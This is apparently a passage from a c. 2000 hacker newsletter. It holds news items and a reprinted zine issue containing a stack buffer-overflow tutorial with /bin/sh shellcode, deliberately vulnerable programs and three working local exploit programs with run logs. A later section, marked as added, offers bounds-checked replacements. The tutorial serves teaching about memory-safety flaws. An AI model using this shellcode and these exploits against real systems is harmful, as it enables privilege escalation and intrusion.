      that it will soon release a software DVD player/decoder for the Linux 
      operating system. 

      Although there is some support for DVD on Linux, some of the open-source 
      operating system's users set up their machines to run both Linux and 
      Windows in order to watch DVD movies and play games. 

      The lack of DVD support for Linux has come to the forefront lately, 
      pushing some developers to come up with solutions that included an 
      unauthorized DVD decoder for Linux, which resulted in lawsuits filed by 
      the DVD industry. 

      InterVideo has a long-standing Content Scrambling System (CSS) license, 
      enabling it to produce and market DVD player/decoder software without 
      violating copyright or other laws. 

      InterVideo sales and marketing head Joe Monastiero says the Linux platform 
      presents a variety of opportunities for the company to expand its existing 
      technology base, including DVD software. 

      "Of notable interest is the set-top environment; however, even the PC 
      space has enough interest in Linux to make our development worthwhile," he 
      said. "Additionally, as should be obvious based on the reports generated 
      by Wired News a few months ago regarding DVD and Linux, the reason 
      why the CSS hack was done for the Linux community is because traditional 
      Windows multimedia developers writing Linux code are not exactly 
      plentiful." 

      The product, dubbed LinDVD, will allow users to play back DVD movies, 
      interactive DVD titles, MPEG video content, and Video CDs on PCs that are 
      equipped with a DVD drive without the need for a hardware decoder card. 
      The decoder/player includes integrated MPEG1 and MPEG2 file 
      playback, a powerful VCD 2.0 player, and SVCD playback. A full 
      multi-channel Dolby Digital (TM) audio decoder will be included. 

      LinDVD will be available late spring and will be priced at $29.95. If 
      "someone writes a multichannel audio driver for their Linux sound card," 
      Monastiero said, "the multichannel version would be $49.95 and would 
      support full 5.1 output." 

      In keeping with the spirit of open source ethics, Monastiero says that 
      InterVideo is looking at ways to open up as much of the product as 
      possible to the OS community. 

      "Certainly, there will be an [application programming interface] published 
      to create unique user experiences and [user interfaces]," he said. "We are 
      also looking at ways to help developers port drivers to our code. 

      "But the CSS, Dolby, and navigation code will definitely not be open 
      source. We're doing this to add a legal player to the market that the DVD 
      industry can also be happy with." 

      "This is another exciting day for the Linux community," said Linus 
      Torvalds, creator of the Linux operating system. "[Linux] continues to 
      attract industry-leading software companies like InterVideo. Their digital 
      video and audio products will greatly enhance the Linux multimedia 
      experience." 
      
      
      @HWA
      
155.0 HNN:Mar 31st:Y2K Survivalists Come Out of Hiding 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench
      Fearing the end of the world, nuclear holocaust, and other terrible
      calamities a Japanese man traveled to extremely remote parts of
      Australia. He believed the world would be plunged into chaos as it
      entered the new millennium. The man traveled to the Willare Bridge
      roadhouse 2334km north of Perth. He arrived carrying a SAS basic
      remote survival book, a gas mask, dehydrated food items, a canteen,
      water purifying tablets and camping gear. He had tried to enter the
      country with a flak jacket and a blow gun but those were confiscated
      by customs officials.
      
      Fairfax IT
      
      http://www.it.fairfax.com.au/breaking/20000330/A39581-2000Mar30.html
      ----------
      
      Japanese tourist survives Y2K test hiccup 
      14:40 Thursday 30 March 2000 AAP 

      STAFF at a remote outback roadhouse in Western Australia revealed today 
      how a Japanese tourist turned up on their doorstep equipped with a flak 
      jacket and gas mask, fearing the Y2K bug would trigger a nuclear 
      explosion. 

      The terrified tourist had travelled to Australia, believing the world 
      would be plunged into chaos as it entered the new millennium. 

      Customs officials revealed yesterday how they stopped the man at 
      immigration carrying a survival kit, a blow gun and a chemical warfare 
      outfit. 

      And in the latest development in the incredible saga, outback residents 
      told today how the man feared Armageddon had arrived, when a routine 
      generator check on New Year's Eve caused a blackout. 

      Lisa Williams, who works at the Willare Bridge roadhouse 2334km north of 
      Perth, said the man "freaked out" when the generators cut out at about 
      10pm on 31 December, resulting in a four-minute power blackout. 

      "He was running around going 'Y2K, Y2K', he was really panic-stricken," 
      Williams said.

      She said the man's English was poor and nobody was able to make him 
      understand what was happening. 

      It was not until roadhouse manager Graeme McNamara telephoned a Japanese 
      interpreter in Broome, who then spoke to the terrified tourist, that he 
      calmed down. 

      "She explained to him that no bombs were going to be falling and that 
      there wasn't going to be a nuclear holocaust, it was just the generators 
      being changed," Williams said.

      He told them he believed the millennium bug would trigger a nuclear 
      explosion and he planned to head for the outback because he thought it 
      would be the safest place to be. 

      When he arrived in Australia, his flak jacket and the blow gun and darts, 
      illegal in Australia, were confiscated by customs officials, it emerged 
      yesterday. 

      But the man was allowed to enter the country with the other items, which 
      included an SAS basic remote survival book, a gas mask, dehydrated food, 
      an army style water container, water purifying tablets and camping gear. 

      Williams said she had tried to show the man the roadhouse's computer 
      console was still working after the power was restored to reassure him 
      that the millennium bug had not eventuated. 

      "I was pointing to the computer and trying to explain to him but he was 
      still in a state about it until he spoke to the interpreter," she said. 

      Roadhouse co-manager Sheree Marich said the man, dressed in army-style 
      camouflage gear, had arrived at the roadhouse earlier that afternoon by 
      taxi from Broome, a 165km trip for which he paid about $300.

      "I didn't understand why the taxi driver had dropped him off to us at 
      first," Marich said.

      "I actually thought he was a bit of a callous bastard who'd taken his 
      money and dumped him in the middle of nowhere." 

      She said it was only later that she learned that the man had researched 
      the area and had asked to be taken there because of its remoteness. 

      The man left Australia, content that the world had not come to an end, 
      after enjoying a restful holiday. 
      
      
      
      @HWA
      
156.0 CoreZine: New zine by lamagra of b0f
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Submitted by: Ed
      Site; http://corezine.seKure.de/
      Owner: lamagra
      
      This zine first came out in July of 1999. Three issues have been released
      at the url above, with a fourth in the works; sadly you won't see it or any
      further releases, as lamagra has decided not to continue the project.
      
      I highly recommend that you grab these while you can, lest they disappear
      off the net. They contain high quality tech papers but proved to be too much
      work for one guy. Lack of advertising and a good plan also contributed to
      the demise of this zine, and little or no response therefore materialized
      from a would-be audience.
      
      The first issue is included here as an example of the quality of this zine;
      check it out and grab the others while you can. - Ed
      
      
      
      ----------------[  Personal

             Handle: lamagra
           Call him: lamagra, lama, lam
       Past handles: access-granted
      Handle origin: Blade (the movie)
      Date of Birth: 28-12-1981
             Height: 185 cm
             Weight: uhmm, dunno 
          Eye color: green-gray
         Hair Color: blonde
          Computers: i586 (120 Mhz) & i486 & i486 (laptop)
           Admin of: UNAH16, my network
   Sites Frequented: www.securityfocus.com
               URLs: http://bounce.to/unah16
              Email: access-granted@geocities.com



      ----------------[  Favorite Things


             Women: hmmm, yeah
              Cars: cabrio's
             Foods: all 
             Music: Hard-Core
         Computers: yeah
            Movies: all action and horror and *yeah*
            Comics: no
             Books: scientific books
         Magazines: corezine, b4b0
                TV: friends
            Quotes: join the army, meet interesting people, kill them
            People: peter, bea, an, psionic, A grue, grimknight, etc.
              Misc: 
          Turn Ons: belly button piercing
         Turn Offs: ignorance



      
     lamagra can be found on EFnet in #b0f ...
     
     
     COREZINE - faq
     ~~~~~~~~~~~~~~~~~
      
      
     FAQ: 

     Q: Why did i start corezine?
     A: Mainly because i want to help spread the knowledge. I like to get into
     new things, but sometimes there's just no info about it anywhere. Then
     you'll have to look at the source (read: linux kernel), but this is way
     over the heads of some people. Nobody likes to look in that big piece of
     code, so they'll just say "nah, nevermind. I'll go do something else".
     Basically i want to save people from all this trouble. If you need help,
     mail me. Don't waste time in lame channels on IRC packed with people who
     don't want to help or can't help (#coders, #linux). 

     COREZINE - sample issue
     ~~~~~~~~~~~~~~~~~~~~~~~
     
     First release July 1999
                        _____                 _______            
                       /  __ \               |___  (_)           
                       | /  \/ ___  _ __ ___    / / _ _ __   ___ 
                       | |    / _ \| '__/ _ \  / / | | '_ \ / _ \
                       | \__/\ (_) | | |  __/./ /__| | | | |  __/
                        \____/\___/|_|  \___|\_____/_|_| |_|\___|
                                                 
      ------[ Corezine volume 01 - July 1999                     
                                      
                                      Corezine #01
                                   ==================
      
      --------[ info
      
      This is the first release of our brand new ezine. Since it's the first
      one, it's not really fantastic. We put it together in a week. 
      But next time (i promise) it'll be huge and fantastic. By then i hope to have 
      finished my "ultimate backdoor", which i will release then. 
      Psionic is working on a new and bigger tutor on installing linux. 
      Everyone should have linux or BSD. We hope to get a lot of readermail and
      other responses. You can mail us at .
      If you want to encrypt your mail, i've added a PGP-key at the bottom of
      this text. 
      REMEMBER: Big Brother is watching.
      
      BTW: i've added extract.c to easily extract the programs included in this
           ezine. I didn't make it myself, you could say i ripped it from phrack.
           But it's not, i just have a lot of stuff to do.
           The program uses the <++> and <--> tags, they aren't part of the
           texts or programs. 
      
      --------[ table  of contents
      
      1. introduction by corestaff
      2. worldnews by peak
      3. guide on bufferoverflows by lamagra
      4. tutorial on sockets by xphantom
      5. guide on file permissions by lamagra
      6. an introduction to perl by darkmo0n 
      7. art of backdoors by meb 
      8. tutorial on installing linux by psionic
      9. hyperterminal trick in windows by burntash
      10. an introduction to C by psylence
      11. a guide on finding holes (in addition to the first text) (17 K)
      
      142 K
      
      
      --------[ Warez
      
      extract.c: see above                            Phrack
      lkm.tgz: my kernel module                       lamagra
      
      Corestaff signing off.
      
      <++> corezine.pgp
      -----BEGIN PGP PUBLIC KEY BLOCK-----
      Version: PGPfreeware 5.0i for non-commercial use
      
      mQGiBDeUjooRBAD/e8RiD1lNRhol32QTse2+fDad6r6IzWK01VSvaOOIwqgjAwPD
      BShcGR2wU3kQ/Y/yT+aW1tmkVThG1k56jryrifu8P6s5EwoRMuFAjmXx9S4s7Px9
      EpD7QJ6e8Ha8nX5oMkzo4lwVg6iJeXBpEsv0fi4JosvfbOvY3A82VGsAvwCg/82F
      SdZ643ctQpeMpX/LelsR7CMEAJ05F/nwDej7orSdqae5OcAXCcW9TbqcLAbOzQZZ
      QvnZePPN6QvCgc/X5bnGuU42YaY883b4jps3fnyMVWe5qR0UHqDq5zxBy1xyEq3I
      ip4q2sLqwiReCTI+eBt7fAjaUlLTtdS/cEQMy5ERQhZWr+Q8ZxELzSjky7eVuciG
      ZNK7A/sFbZVVfpgT0edCyOPkhsIuxctcQENLZ8kRy2S1I68388dN5hVLGtPXn1b+
      QfbwtQBX/sowyU0bkR9PQy6I1K8GvhX49Wo+q0ZXRIjt92oU4ioqnRpsc5buRMUc
      z5UjGTSxTIgIWiYFSdLOSTmNAAQvrj1sjWpm9tSuHA2YBBtErrQGdW5haDE2iQBL
      BBARAgALBQI3lI6KBAsDAQIACgkQ+xtU4W2kapHbWQCbBbg8mc5PCZE1Z5HPEoO/
      la29WnMAoLryW301F92f526TkE6iQSFO/X1OuQENBDeUjqkQBADHnvWOGb1qX8dV
      YIGuZJGtAJLHvx1VNMM/C786eHLtl+MwHDl0OpJEIKM7cfT/lQmlmGuMTXvthlP/
      qLaALC6G3StdVmRwqU+sXzpe97OPps5xsOS2bxESqgZYO7g6IwPQE31/xe0Qfzmz
      uikuamnJF6YtOlD1qrFoaGvIggpYZwACAgP+IiVjaYBvckuHDI73gd1kC+D+aS2C
      JQKQ1IxUxwJzOqw3ExVP0qDEJL1WpASB4FYe2QRHEDIHLn1Xn8RC0KnbZmbTE0sP
      IJqjCENY2i2T+l0NNc0UCsjlzcv6xLt+JpDUI/9NpFFEfioZuUIAMDkoIaoVCgkw
      r1zN67AlbaV0REKJAD8DBRg3lI6p+xtU4W2kapERAryEAJ97NQp4ANiB7uh3Ine3
      MchIHoPSowCfWM6n0+bnd7njmGvOg+KdOQxtcQI=
      =xS9u
      -----END PGP PUBLIC KEY BLOCK-----
      <-->
      
      -----------------------[ BUFFEROVERFLOWS
           by Lamagra

       <++> buffer/example.c
       #include <string.h>

       /* deliberately vulnerable: small_string cannot hold 100 bytes */
       int main(void)
       {
               char big_string[100];
               char small_string[50];

               memset(big_string,0x41,100);
               /* strcpy(char *to,char *from) */
               strcpy(small_string,big_string);
               return 0;
       }
      <--> end of example.c
      
       The program creates two strings; memset() fills big_string with the
       char 0x41 (= A). Then it copies big_string into small_string.
       As we all see, small_string can't hold 100 chars and a buffer overflow
       follows.
      
      Let's take a look at the memory:
      
      [    big_string     ] [ small_string ] [SFP] [RET] 
      
       During the buffer overflow the SFP (Stack Frame Pointer) and the RET will
       be overwritten by A's. This means that the RET will now be 0x41414141
       (0x41 is the hex value of A). When the function returns, the IP (instruction
       pointer) will be loaded with the overwritten RET. Then the computer will try
       to execute the instruction at 0x41414141. This results in a segmentation
       violation because this address is outside the process's address space.
      
      
      --------------------[ Exploitation
      
      Now that we know we can change the flow of the program by overwriting the RET,
      we can try to exploit it. Instead of overwriting with A's, we could 
      overwrite it with a specific address.
      
      ------------[ Execution of arbitrary code
      
      Now we need something to point the address to and execute. In most cases 
      we'll just spawn a shell, although this is not the only thing we can do.
      
      Before:
      
              FFFFF BBBBBBBBBBBBBBBBBBBBB EEEE RRRR FFFFFFFFFF
      
              B = the buffer
              E = stack frame pointer
              R = return address
              F = other data
      
      After:
              FFFFF SSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF
      
              S = shellcode
              A = address pointing to the shellcode
              F = other data
      
      
      The code to spawn a shell in C looks like this:
      
      <++> buffer/shell.c
       #include <unistd.h>
       #include <stdlib.h>

       int main(void){
         char *name[2];

         name[0] = "/bin/sh";
         name[1] = 0x0;
         execve(name[0], name, 0x0);
         exit(0);
       }
      <--> end of shellcode
      
      I'm not going to explain how to produce shellcode because this will require a 
      lot of knowledge in ASM. It's a long and boring process that we don't need to 
      get into because there is more than enough shellcode available.
      
      For those who want to learn how to make it:
              - compile the program above using the -static flag
              - open it up in gdb, use the "disassemble main" command
              - take all the unnecessary code
              - change and rewrite it, this time in ASM
              - compile, open it up in gdb and use the "disassemble main" command
              - use the x/bx command on the addresses of the instructions 
                and retrieve the hex-code.
      
                                     XXXXXXXXXXX
                                     X WAKE UP X
                                     XXXXXXXXXXX
      
      Or you can just take this code
      char shellcode[]=
              "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
              "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
              "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      
      ------------[ Finding the address
      
       When we try to overflow a buffer of another program, the problem is finding
       the address of the buffer. The answer to this problem is that for every program
       the stack starts at the same address. Therefore by knowing where the stack
       starts we can try to guess the address of the buffer.
      
      This program will give us its stack pointer:
      
      <++> buffer/getsp.c
       #include <stdio.h>

       /* x86-32 only: the value left in %eax is the return value
          under the i386 calling convention */
       unsigned long get_sp(void){
         __asm__("movl %esp, %eax");
       }
       int main(void){
          fprintf(stdout,"0x%lx\n",get_sp());
          return 0;
       }
      <--> end of getsp.c
      
      ------------[ Trying to exploit an example
      
      We're going to try to exploit this program:
      
      <++> buffer/hole.c
       #include <string.h>

       /* deliberately vulnerable: argv[1] is copied with no length check */
       int main(int argc, char *argv[]){
         char buffer[512];

         if (argc > 1) /* otherwise we crash our little program */
            strcpy(buffer,argv[1]);
         return 0;
       }
      <--> end of hole.c
      
      <++> buffer/exploit1.c
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
      
      #define DEFAULT_OFFSET                    0
      #define DEFAULT_BUFFER_SIZE             512
      
      char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      
      unsigned long get_sp(void) {
         __asm__("movl %esp,%eax");
      }
      
       int main(int argc, char *argv[])
      {
        char *buff, *ptr;
        long *addr_ptr, addr;
        int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
        int i;
      
        if (argc > 1) bsize  = atoi(argv[1]);
        if (argc > 2) offset = atoi(argv[2]);
      
        if (!(buff = malloc(bsize))) {
               printf("Can't allocate memory.\n");
               exit(0);
        }
      
        addr = get_sp() - offset;
        printf("Using address: 0x%x\n", addr);
      
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i+=4)
             *(addr_ptr++) = addr;
      
        ptr += 4;
      
        for (i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];
      
        buff[bsize - 1] = '\0';
      
        memcpy(buff,"BUF=",4);
        putenv(buff);
        system("/bin/bash");
      }
      <--> end of exploit1.c
      
      
      Now we can try to guess the offset (bufferaddress = stackpointer + offset).
      
      [bubbles]$ exploit1 600
      Using address: 0xbffff6c3
      [bubbles]$ ./hole $BUF
      [bubbles]$ exploit1 600 100
      Using address: 0xbffffce6
      [bubbles]$ ./hole $BUF
      segmentation fault
       etc.
      
       As you see this process is nearly impossible: we have to guess the exact address
       of the buffer. To increase our chances, we can pad NOPs before the shellcode
       in our overflow buffer. The NOP instruction does nothing except pass execution
       on to the next instruction. We use it because then we don't need to guess the
       exact address of the buffer: if the overwritten return address points anywhere
       inside the NOP string, the CPU runs through the NOPs and reaches our code right
       after them.
      
      The memory should look like this:
              FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF
      
              N = NOP
              S = shellcode
              A = address pointing to the shellcode
              F = other data
      
      We rewrite our old exploit.
      
      <++> buffer/exploit2.c
        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>
      
       #define DEFAULT_OFFSET                    0
       #define DEFAULT_BUFFER_SIZE             512
       #define NOP                            0x90
      
       char shellcode[] =
         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      
      unsigned long get_sp(void) {
         __asm__("movl %esp,%eax");
      }
      
       int main(int argc, char *argv[])
      {
        char *buff, *ptr;
        long *addr_ptr, addr;
        int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
        int i;
      
        if (argc > 1) bsize  = atoi(argv[1]);
        if (argc > 2) offset = atoi(argv[2]);
      
        if (!(buff = malloc(bsize))) {
              printf("Can't allocate memory.\n");
              exit(0);
        }
      
        addr = get_sp() - offset;
        printf("Using address: 0x%x\n", addr);
      
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i+=4)
               *(addr_ptr++) = addr;
      
        for (i = 0; i < bsize/2; i++)
               buff[i] = NOP;
      
        ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
        for (i = 0; i < strlen(shellcode); i++)
               *(ptr++) = shellcode[i];
      
        buff[bsize - 1] = '\0';
      
        memcpy(buff,"BUF=",4);
        putenv(buff);
        system("/bin/bash");
      }
      <--> end of exploit2.c
      
      [bubbles]$ exploit2 600
      Using address: 0xbffff6c3
      [bubbles]$ ./hole $BUF
      segmentation fault
      [bubbles]$ exploit2 600 100
      Using address: 0xbffffce6
      [bubbles]$ ./hole $BUF
      #exit
      [bubbles]$
      
      To improve our exploit even more, we could place the shellcode inside an 
      environment variable. Then we could overflow the buffer with the address of this 
      variable. This method will increase our chances even more.
      
      We modify our code so it uses the setenv() call to put the shellcode in the environment. 
      
      <++> buffer/exploit3.c
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
      
      #define DEFAULT_OFFSET                    0
      #define DEFAULT_BUFFER_SIZE             512
      #define DEFAULT_EGG_SIZE               2048
      #define NOP                            0x90
      
      char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      
      unsigned long get_esp(void) {
         __asm__("movl %esp,%eax");
      }
      
       int main(int argc, char *argv[])
      {
         char *buff, *ptr, *egg;
         long *addr_ptr, addr;
         int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
         int i, eggsize=DEFAULT_EGG_SIZE;
      
         if (argc > 1) bsize   = atoi(argv[1]);
         if (argc > 2) offset  = atoi(argv[2]);
         if (argc > 3) eggsize = atoi(argv[3]);
      
         if (!(buff = malloc(bsize))) {
               printf("Can't allocate memory.\n");
               exit(0);
         }
                                           
         if (!(egg = malloc(eggsize))) {
               printf("Can't allocate memory.\n");
               exit(0);
         }
      
         addr = get_esp() - offset;
         printf("Using address: 0x%x\n", addr);
      
         ptr = buff;
         addr_ptr = (long *) ptr;
         for (i = 0; i < bsize; i+=4)
                 *(addr_ptr++) = addr;
      
         ptr = egg;
         for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
                   *(ptr++) = NOP;
      
         for (i = 0; i < strlen(shellcode); i++)
                   *(ptr++) = shellcode[i];
      
         buff[bsize - 1] = '\0';
         egg[eggsize - 1] = '\0';
         memcpy(egg,"BUF=",4);
         putenv(egg);
         memcpy(buff,"RET=",4);
         putenv(buff);
         system("/bin/bash");
      }
       <--> end of exploit3.c
      
      [bubbles]$ exploit2 600 
      Using address: 0xbffff5d7
      [bubbles]$ ./hole $RET
      #exit
      [bubbles]$
      
      --------------------[ Finding bufferoverflows
      
       There is really only one way to find buffer overflows, and that is by reading the
       source. Since Linux is an open-source system, it is easy to obtain the source
       of the programs. Long live open-source.

       Look for library functions that don't perform boundary checking like:
               strcpy(), strcat(), sprintf(), vsprintf(), scanf().
       Other dangerous ones are:
               getc() and getchar() put in a while loop.
               misuse of strncat().
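       The safe counterparts of the functions listed above, as an added example
       that is not code from this guide: a bounded copy that refuses the 100-byte
       string from example.c instead of writing past a 50-byte buffer (the same
       defect as hole.c), a bounded line reader in place of the unchecked getc()
       loop, and an snprintf() wrapper that notices truncation. The function
       names (copy_bounded, read_line_bounded, format_bounded, read_line_from_string,
       run_bounds_demo) and the sample inputs are mine, not the author's.

```c
#include <stdio.h>
#include <string.h>

/* Hardened counterpart of strcpy() as used in example.c/hole.c: copies src
 * into dst only if it fits together with the terminating NUL, otherwise
 * refuses and leaves dst untouched. Returns 0 on success, -1 if rejected. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t n;
    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    for (n = 0; n < dstsize && src[n] != '\0'; n++)   /* never scans past dstsize */
        ;
    if (n == dstsize)                 /* no NUL within dstsize: too long */
        return -1;
    memcpy(dst, src, n + 1);          /* n + 1 <= dstsize, includes the NUL */
    return 0;
}

/* Bounded replacement for the unchecked getc()/getchar() loop: reads one line
 * from fp, storing at most bufsize - 1 characters. Returns the number stored,
 * or -1 if the line did not fit (the rest of that line is discarded so the
 * caller does not resume in the middle of it). */
long read_line_bounded(FILE *fp, char *buf, size_t bufsize)
{
    size_t len = 0;
    int c;
    if (buf == NULL || bufsize == 0)
        return -1;
    while ((c = getc(fp)) != EOF && c != '\n') {
        if (len + 1 >= bufsize) {             /* no room for this char plus NUL */
            while ((c = getc(fp)) != EOF && c != '\n')
                ;                              /* drain the rest of the line */
            buf[len] = '\0';
            return -1;
        }
        buf[len++] = (char)c;
    }
    buf[len] = '\0';
    return (long)len;
}

/* sprintf() replacement that notices truncation: snprintf() returns the length
 * the complete output would have had, so a value >= dstsize means it was cut.
 * Returns 0 if the whole message fitted, -1 otherwise. */
int format_bounded(char *dst, size_t dstsize, const char *user)
{
    int n = snprintf(dst, dstsize, "hello %s", user);
    return (n < 0 || (size_t)n >= dstsize) ? -1 : 0;
}

/* Feeds a constructed byte string through read_line_bounded() via a temporary
 * file so the demo runs offline. */
long read_line_from_string(const char *text, char *buf, size_t bufsize)
{
    long r;
    FILE *fp = tmpfile();
    if (fp == NULL)
        return -1;
    fputs(text, fp);
    rewind(fp);
    r = read_line_bounded(fp, buf, bufsize);
    fclose(fp);
    return r;
}

/* Self-check on constructed inputs; returns the number of failed checks (0 = all good). */
int run_bounds_demo(void)
{
    char small[50], big[101], line[8];
    int failures = 0;

    memset(big, 'A', 100);            /* example.c's 100 x 0x41 ... */
    big[100] = '\0';

    /* ... into a 50-byte buffer: refused instead of smashing the stack */
    if (copy_bounded(small, sizeof small, big) != -1) failures++;
    if (copy_bounded(small, sizeof small, "short") != 0 || strcmp(small, "short") != 0) failures++;

    /* the same oversized input through the formatting path */
    if (format_bounded(small, sizeof small, big) != -1) failures++;
    if (format_bounded(small, sizeof small, "bob") != 0 || strcmp(small, "hello bob") != 0) failures++;

    /* a line that fits an 8-byte buffer, then one that would have overrun it */
    if (read_line_from_string("abc\nrest", line, sizeof line) != 3 || strcmp(line, "abc") != 0) failures++;
    if (read_line_from_string("0123456789\n", line, sizeof line) != -1 || strcmp(line, "0123456") != 0) failures++;

    return failures;
}

int main(void)
{
    int failures = run_bounds_demo();
    printf("%d check(s) failed\n", failures);
    return failures == 0 ? 0 : 1;
}
```

       Every one of these returns an error the caller can act on instead of
       silently writing past the end of the destination, which is the whole
       difference between example.c and a program that merely rejects bad input.
       Modern toolchains and kernels add stack protectors, non-executable stacks
       and address randomization on top, which is why the address guessing in
       this guide no longer works as written; none of them replace bounds checks
       in the code itself.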
      
       --------------------[ Other references
      
      Smashing the stack for fun and profit by aleph1
      bufferoverflows by mudge
      
      --------------------[ Ending
      
       Well, that about wraps it up. I hope you learned something and enjoyed reading this guide.
       I enjoyed writing it.
       If you have any further questions, remarks or anything, you can find me on IRC
       (irc.box5.net) in some channel.
      
      --------------------[ EOF
              
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
                         The *beginners* guide to sockets in C
                                     By: xphantom
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      
       So, you want to connect to other computers from within your own programs,
       you say? You can't find any info on the net to teach you how to do so? You
       have no idea what man pages to look up? You can't find/afford any books?
       Well, you came to the right place. In this paper I hope to give you a jump
       start into programming your own Internet applications in C. This paper
       does assume at least *some* familiarity with C and its syntax, and also
       that you are using some form of UNIX or Linux (from now on referred to as
       *nix). Although large parts of programming sockets in *nix are the same as
       in Windows, there are some differences which I won't get into (because I don't
       program in Windows ;)). It should also be noted that all code contained
       in this paper was written and compiled on a Red Hat 5.2 system using
       glibc 2.0.7 and libc 5.3.12 and it all compiled fine. Now, let's get on
       with the show, shall we.
      
       To a programmer, sockets are very similar to a low-level file descriptor
       (you can even use the read() and write() functions with your sockets),
       although creating the socket itself is more involved than opening, reading
       and writing files, due to the additional complexity of creating a network
       connection compared to reading and writing your own hard drive.
      
       For most socket use, you will need a client/server pair. The server's job
       is to listen on a specified port and perform some action when it receives
       a request from the client, while the client's job (obviously) is to "ask"
       the server to perform whatever task(s) it was programmed to do.
      
      We won't be using *every* socket type function in this paper since it is a
      beginner's tutorial, but there will be enough information to get you up and
      running and (hopefully) having some fun. With that said, let's make some
      sockets.
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      Creating a socket with: socket()
      
      The first thing you need to do to write your socket program is (of course)
      create a socket, using the socket() function:
      -------
      
       #include <sys/types.h>
       #include <sys/socket.h>
      
      int socket(int af, int type, int protocol)
      
      ------
      'int af' is the address family or domain the socket is part of. The two
      most common are:
              AF_UNIX - Used for interprocess communication on a single machine.
              AF_INET - Used for interprocess communication on the same, or
              different systems using the DARPA protocols (UDP/TCP/IP).
      
      'int type' is what type of connection you'll be using, the two most common 
      are:
              SOCK_STREAM - Used for connection oriented sockets, guaranteed data
              delivery, or an error will be received by the sender.
              SOCK_DGRAM - Used for connection less sockets, data delivery not
              guaranteed.
      
      In this paper we will focus on family AF_INET and type SOCK_STREAM.
      
      'int protocol' A protocol value of 0 is very common. This permits the
      system to choose the first protocol which is permitted with the pair of
      values specified for family and type.
      
      On success, a file descriptor is returned, on failure -1 is returned and
      errno is set accordingly. E.G:
      ------
      
       #include <sys/types.h>
       #include <sys/socket.h>

       int sockfd; /* soon to be socket file descriptor */

          sockfd = socket(AF_INET, SOCK_STREAM, 0);
         /* error checking here */
      
      ------
      And if all goes well, we now have a socket file descriptor that we can use
      across the Internet (AF_INET) using a connection based protocol
      (SOCK_STREAM) Remember, the protocol (0) is automatically set for us.
      
      =+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
      Giving your socket a name using: bind()
      
       Ok, now we have our socket created. The next thing is we need to do something with it.
       Let's try giving it a name using bind():
      ------
      
       #include <sys/types.h>
       #include <sys/socket.h>
      
      int bind(int sockfd, struct sockaddr *name, int namelen)
      
      ------
      In a call to bind(), sockfd is the file descriptor for the socket, obtained 
      from the call to socket(). Name is a pointer to a structure of type sockaddr.
      If the address family is AF_UNIX (as specified when the socket is created),
      the structure is defined as follows:
      ------
      
      struct sockaddr {
                      u_short sa_family;
                      char    sa_data[14];
              };
      
      ------
      name.sa_family should be AF_UNIX. name.sa_data should contain up to 14
      bytes of a file name which will be assigned to the socket. namelen gives
      the actual length of name, that is, the length of the initialized contents
      of the data structure. E.G:
      ------
      
       #include <sys/types.h>
       #include <sys/socket.h>
       #include <string.h>

       struct sockaddr name;
       int sockfd;

          name.sa_family = AF_UNIX;
          strcpy(name.sa_data, "/tmp/whatever"); /* 13 chars + NUL fits the 14-byte field */

          sockfd = socket(AF_UNIX, SOCK_STREAM, 0);
          /* error checking code here */

          bind(sockfd, &name, strlen(name.sa_data) + sizeof(name.sa_family));
         /* error checking code here */
      
      ------
      error checking note: on success bind() returns 0, on failure bind() returns
      -1 and sets errno accordingly.
      Now, in a call to bind using AF_INET we could use a different structure:
      -----
      
      struct sockaddr_in {
              short int          sin_family;  /* Address family               */
              unsigned short int sin_port;    /* Port number                  */
              struct in_addr     sin_addr;    /* Internet address             */
              unsigned char      sin_zero[8]; /* Same size as struct sockaddr */
          };
      
      ------
       This is a bit bigger and more involved but isn't too hard at all. Let's look
       at an example:
      ------
      
       #include <stdio.h>
       #include <stdlib.h>
       #include <errno.h>
